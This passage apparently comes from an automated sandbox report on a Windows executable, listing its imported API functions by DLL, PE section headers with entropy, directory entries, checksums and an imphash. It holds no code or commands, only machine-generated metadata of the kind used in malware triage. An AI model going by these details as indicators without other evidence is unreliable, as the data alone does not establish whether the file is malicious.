2270. "address": "0x40a034"
2271. },
2272. {
2273. "name": "lstrlenA",
2274. "address": "0x40a038"
2275. },
2276. {
2277. "name": "GetVersionExA",
2278. "address": "0x40a03c"
2279. },
2280. {
2281. "name": "GetVersionExW",
2282. "address": "0x40a040"
2283. },
2284. {
2285. "name": "InterlockedDecrement",
2286. "address": "0x40a044"
2287. },
2288. {
2289. "name": "GetCommandLineA",
2290. "address": "0x40a048"
2291. },
2292. {
2293. "name": "VirtualAllocEx",
2294. "address": "0x40a04c"
2295. },
2296. {
2297. "name": "GetCurrentProcess",
2298. "address": "0x40a050"
2299. },
2300. {
2301. "name": "GetModuleHandleA",
2302. "address": "0x40a054"
2303. },
2304. {
2305. "name": "GetStartupInfoW",
2306. "address": "0x40a058"
2307. }
2308. ],
2309. "dll": "KERNEL32.dll"
2310. },
2311. {
2312. "imports": [
2313. {
2314. "name": "DefWindowProcW",
2315. "address": "0x40a068"
2316. },
2317. {
2318. "name": "LoadStringW",
2319. "address": "0x40a06c"
2320. },
2321. {
2322. "name": "SetActiveWindow",
2323. "address": "0x40a070"
2324. },
2325. {
2326. "name": "ReleaseCapture",
2327. "address": "0x40a074"
2328. },
2329. {
2330. "name": "CreateWindowExA",
2331. "address": "0x40a078"
2332. },
2333. {
2334. "name": "GetMenuStringW",
2335. "address": "0x40a07c"
2336. },
2337. {
2338. "name": "UnregisterClassA",
2339. "address": "0x40a080"
2340. },
2341. {
2342. "name": "DestroyWindow",
2343. "address": "0x40a084"
2344. },
2345. {
2346. "name": "RegisterClassW",
2347. "address": "0x40a088"
2348. },
2349. {
2350. "name": "SendMessageW",
2351. "address": "0x40a08c"
2352. },
2353. {
2354. "name": "CreateWindowExW",
2355. "address": "0x40a090"
2356. },
2357. {
2358. "name": "SetWindowLongW",
2359. "address": "0x40a094"
2360. },
2361. {
2362. "name": "LoadIconA",
2363. "address": "0x40a098"
2364. }
2365. ],
2366. "dll": "USER32.dll"
2367. },
2368. {
2369. "imports": [
2370. {
2371. "name": "RegOpenKeyExW",
2372. "address": "0x40a000"
2373. },
2374. {
2375. "name": "RegOpenKeyExA",
2376. "address": "0x40a004"
2377. }
2378. ],
2379. "dll": "ADVAPI32.dll"
2380. },
2381. {
2382. "imports": [
2383. {
2384. "name": "ImageList_Add",
2385. "address": "0x40a00c"
2386. }
2387. ],
2388. "dll": "COMCTL32.dll"
2389. },
2390. {
2391. "imports": [
2392. {
2393. "name": "SetupDecompressOrCopyFileA",
2394. "address": "0x40a060"
2395. }
2396. ],
2397. "dll": "SETUPAPI.dll"
2398. },
2399. {
2400. "imports": [
2401. {
2402. "name": "_exit",
2403. "address": "0x40a0a0"
2404. },
2405. {
2406. "name": "_c_exit",
2407. "address": "0x40a0a4"
2408. },
2409. {
2410. "name": "_cexit",
2411. "address": "0x40a0a8"
2412. },
2413. {
2414. "name": "exit",
2415. "address": "0x40a0ac"
2416. },
2417. {
2418. "name": "_wcmdln",
2419. "address": "0x40a0b0"
2420. },
2421. {
2422. "name": "__wgetmainargs",
2423. "address": "0x40a0b4"
2424. },
2425. {
2426. "name": "_initterm",
2427. "address": "0x40a0b8"
2428. },
2429. {
2430. "name": "__setusermatherr",
2431. "address": "0x40a0bc"
2432. },
2433. {
2434. "name": "_adjust_fdiv",
2435. "address": "0x40a0c0"
2436. },
2437. {
2438. "name": "__p__commode",
2439. "address": "0x40a0c4"
2440. },
2441. {
2442. "name": "__p__fmode",
2443. "address": "0x40a0c8"
2444. },
2445. {
2446. "name": "__set_app_type",
2447. "address": "0x40a0cc"
2448. },
2449. {
2450. "name": "_controlfp",
2451. "address": "0x40a0d0"
2452. },
2453. {
2454. "name": "__dllonexit",
2455. "address": "0x40a0d4"
2456. },
2457. {
2458. "name": "_onexit",
2459. "address": "0x40a0d8"
2460. },
2461. {
2462. "name": "_except_handler3",
2463. "address": "0x40a0dc"
2464. },
2465. {
2466. "name": "_XcptFilter",
2467. "address": "0x40a0e0"
2468. }
2469. ],
2470. "dll": "msvcrt.dll"
2471. }
2472. ],
2473. "digital_signers": null,
2474. "exported_dll_name": null,
2475. "actual_checksum": "0x0002d30a",
2476. "overlay": {
2477. "size": "0x00001f00",
2478. "offset": "0x00025000"
2479. },
2480. "imagebase": "0x00400000",
2481. "reported_checksum": "0x0002d30a",
2482. "icon_hash": null,
2483. "entrypoint": "0x004083d6",
2484. "timestamp": "2019-06-12 20:02:55",
2485. "osversion": "4.0",
2486. "sections": [
2487. {
2488. "name": ".text",
2489. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2490. "virtual_address": "0x00001000",
2491. "size_of_data": "0x00008000",
2492. "entropy": "5.82",
2493. "raw_address": "0x00001000",
2494. "virtual_size": "0x000076b6",
2495. "characteristics_raw": "0xf0000020"
2496. },
2497. {
2498. "name": ".bss",
2499. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2500. "virtual_address": "0x00009000",
2501. "size_of_data": "0x00000000",
2502. "entropy": "0.00",
2503. "raw_address": "0x00000000",
2504. "virtual_size": "0x00000030",
2505. "characteristics_raw": "0xc0000080"
2506. },
2507. {
2508. "name": ".rdata",
2509. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2510. "virtual_address": "0x0000a000",
2511. "size_of_data": "0x00001000",
2512. "entropy": "2.39",
2513. "raw_address": "0x00009000",
2514. "virtual_size": "0x0000061c",
2515. "characteristics_raw": "0x40000040"
2516. },
2517. {
2518. "name": ".data",
2519. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2520. "virtual_address": "0x0000b000",
2521. "size_of_data": "0x0001a000",
2522. "entropy": "6.12",
2523. "raw_address": "0x0000a000",
2524. "virtual_size": "0x00019d54",
2525. "characteristics_raw": "0xd0000040"
2526. },
2527. {
2528. "name": ".reloc",
2529. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
2530. "virtual_address": "0x00025000",
2531. "size_of_data": "0x00001000",
2532. "entropy": "0.68",
2533. "raw_address": "0x00024000",
2534. "virtual_size": "0x0000025c",
2535. "characteristics_raw": "0x42000040"
2536. }
2537. ],
2538. "resources": [],
2539. "dirents": [
2540. {
2541. "virtual_address": "0x00000000",
2542. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
2543. "size": "0x00000000"
2544. },
2545. {
2546. "virtual_address": "0x0000a104",
2547. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
2548. "size": "0x0000008c"
2549. },
2550. {
2551. "virtual_address": "0x00000000",
2552. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
2553. "size": "0x00000000"
2554. },
2555. {
2556. "virtual_address": "0x00000000",
2557. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
2558. "size": "0x00000000"
2559. },
2560. {
2561. "virtual_address": "0x00025000",
2562. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
2563. "size": "0x00001f00"
2564. },
2565. {
2566. "virtual_address": "0x00025000",
2567. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
2568. "size": "0x00000118"
2569. },
2570. {
2571. "virtual_address": "0x00000000",
2572. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
2573. "size": "0x00000000"
2574. },
2575. {
2576. "virtual_address": "0x00000000",
2577. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
2578. "size": "0x00000000"
2579. },
2580. {
2581. "virtual_address": "0x00000000",
2582. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
2583. "size": "0x00000000"
2584. },
2585. {
2586. "virtual_address": "0x00000000",
2587. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
2588. "size": "0x00000000"
2589. },
2590. {
2591. "virtual_address": "0x00000000",
2592. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
2593. "size": "0x00000000"
2594. },
2595. {
2596. "virtual_address": "0x00000000",
2597. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
2598. "size": "0x00000000"
2599. },
2600. {
2601. "virtual_address": "0x0000a000",
2602. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
2603. "size": "0x000000e8"
2604. },
2605. {
2606. "virtual_address": "0x00000000",
2607. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
2608. "size": "0x00000000"
2609. },
2610. {
2611. "virtual_address": "0x00000000",
2612. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
2613. "size": "0x00000000"
2614. },
2615. {
2616. "virtual_address": "0x00000000",
2617. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
2618. "size": "0x00000000"
2619. }
2620. ],
2621. "exports": [],
2622. "guest_signers": {},
2623. "imphash": "7e4334085562a74ad98ab8806ba673ef",
2624. "icon_fuzzy": null,
2625. "icon": null,
2626. "pdbpath": null,
2627. "imported_dll_count": 6,
2628. "versioninfo": []
2629. }
2630. }